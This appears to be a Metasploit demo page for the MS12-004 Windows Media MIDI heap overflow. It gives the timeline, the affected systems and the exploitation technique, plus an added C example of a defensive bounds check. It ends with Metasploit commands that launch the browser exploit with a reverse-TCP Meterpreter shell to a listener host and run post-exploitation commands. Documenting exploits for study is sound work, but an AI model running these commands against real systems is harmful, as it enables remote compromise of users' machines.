MS12-004 Windows Media Remote Code Execution Metasploit Demo
Timeline :
Vulnerability discovered and reported to the vendor by Shane Garrett
Coordinated public release of the vulnerability the 2012-01-10
Vulnerability exploited in the wild
Metasploit PoC provided the 2012-01-27
PoC provided by :
Shane Garrett
juan vazquez
sinn3r
Reference(s) :
MS12-004
CVE-2012-0003
OSVDB-78210
Affected version(s) :
Windows XP SP3
Windows XP Media Center Edition 2005 SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP2
Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems SP2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit SP1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based SP1
Tested on Windows XP SP3 with :
winmm.dll 5.1.2600.5512
Description :
This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player's ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation to be higher than how much is available on the heap (0x400 bytes allocated by WINMM!winmmAlloc), and then allowing us to either "inc al" or "dec al" a byte. This can be used to corrupt an array (CImplAry) we set up, and force the browser to confuse types from tagVARIANT objects, which leads to remote code execution under the context of the user. At this time, for the IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.
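The root cause described above is an offset derived from attacker-controlled file data that is used to increment or decrement one byte of a fixed 0x400-byte heap allocation without being checked against that allocation's size. The following C program is an added illustration of the bounds check that closes that defect class; it is not the Metasploit module's code and not winmm.dll's code. The event layout (`struct toy_event`), the offset formula in `derive_offset`, and the sample events are all hypothetical and constructed for the example; only the 0x400 table size is taken from the description.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Size of the fixed heap chunk the description attributes to WINMM!winmmAlloc. */
#define TABLE_SIZE 0x400

/* Hypothetical event record. The real MIDI track format and the real
 * winmm.dll offset arithmetic are deliberately NOT reproduced here. */
struct toy_event {
    uint8_t  op;      /* 0 = increment the target byte, 1 = decrement it */
    uint16_t param;   /* 16-bit value read straight from the input file */
};

/* Hypothetical offset derivation from the event parameter. Any arithmetic
 * that turns input-controlled values into an index must be range-checked
 * before it is used to address the table. */
static size_t derive_offset(const struct toy_event *ev)
{
    return (size_t)ev->param * 4u;
}

/* Apply `count` events to a TABLE_SIZE-byte table.
 * Returns the number of events applied, or -1 (with the table left
 * untouched) if any event would address a byte outside the table or
 * carries an unknown opcode. The whole stream is validated before any
 * write so that a rejected file cannot partially modify state. */
int apply_events(uint8_t table[TABLE_SIZE], const struct toy_event *events, size_t count)
{
    for (size_t i = 0; i < count; i++) {
        size_t off = derive_offset(&events[i]);
        if (off >= TABLE_SIZE) {
            /* This is the check whose absence lets a crafted event reach
             * past the 0x400-byte allocation and corrupt adjacent heap data. */
            fprintf(stderr, "event %zu: offset 0x%zx exceeds table of 0x%x bytes, rejecting\n",
                    i, off, (unsigned)TABLE_SIZE);
            return -1;
        }
        if (events[i].op > 1) {
            fprintf(stderr, "event %zu: unknown opcode %u, rejecting\n", i, events[i].op);
            return -1;
        }
    }
    for (size_t i = 0; i < count; i++) {
        size_t off = derive_offset(&events[i]);
        if (events[i].op == 0)
            table[off]++;   /* the in-bounds equivalent of "inc" on one byte */
        else
            table[off]--;   /* the in-bounds equivalent of "dec" on one byte */
    }
    return (int)count;
}

int main(void)
{
    uint8_t table[TABLE_SIZE];
    memset(table, 0, sizeof table);

    /* Constructed sample streams: the first stays inside the table, the
     * second contains an event whose derived offset is exactly 0x400. */
    const struct toy_event good[] = { { 0, 3 }, { 1, 0xFF } };
    const struct toy_event bad[]  = { { 0, 3 }, { 0, 0x100 } };

    printf("good stream: %d events applied\n", apply_events(table, good, 2));
    printf("bad stream: result %d (expected -1)\n", apply_events(table, bad, 2));
    return 0;
}
```

The sample "bad" stream is rejected before any byte is modified, which is the property a hardened parser needs: validation of every derived index against the real allocation size, not against whatever the file claims.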
Commands :
use exploit/windows/browser/ms12_004_midi
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit
sysinfo
getuid